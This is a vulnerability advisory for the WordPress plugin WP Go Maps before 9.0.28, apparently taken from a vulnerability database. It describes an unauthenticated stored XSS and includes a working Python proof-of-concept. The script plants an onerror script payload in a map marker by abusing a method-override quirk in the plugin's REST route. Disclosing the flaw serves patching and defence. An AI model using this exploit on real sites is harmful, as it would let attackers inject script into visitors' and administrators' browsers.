WP Go Maps < 9.0.28 - Unauthenticated Stored XSS

2023-12-1200:00:00

Marc Montpas

wp go maps

unauthenticated

stored xss

python script

vulnerable site

marker

xss payload

endpoint

exploit

6.7 Medium

AI Score

Confidence

Low

0.0005 Low

EPSS

Percentile

17.1%

JSON

Description The plugin does not properly protect most of its REST API routes, which attackers can abuse to store malicious HTML/Javascript on the site.

Run the following Python script, then visit https://vulnerable-site.tld/wp-admin/admin.php?page=wp-google-maps-menu&action=edit&map_id=1.

Alternatively, visit the page where the map is displayed after the fact and click on the affected marker to trigger the XSS.
```
import sys
import requests

if len(sys.argv) != 2:
    print(f'{sys.argv[0]} <target_site_root_url>')
    sys.exit()

url = sys.argv[1].rstrip('/')

# Get list of existing markers
res = requests.get(f'{url}/wp-json/wpgmza/v1/markers').json()

if len(res) == 0:
    print('# No markers found! Make sure the plugin is properly setup.')
    sys.exit()

marker_id = res[0]['id']
print(f'# Found marker ID #{marker_id}, using it to demonstrate the exploit')

print('# Tricking the POST section of the endpoint to store our XSS payload..')
body = {
    'address': '<img src="x" onerror=alert("xss")//">'
}
requests.post(f'{url}/wp-json/wpgmzA/v1/markers?_method=get&random=/wpgmza/v1/markers/{marker_id}', data=body)
```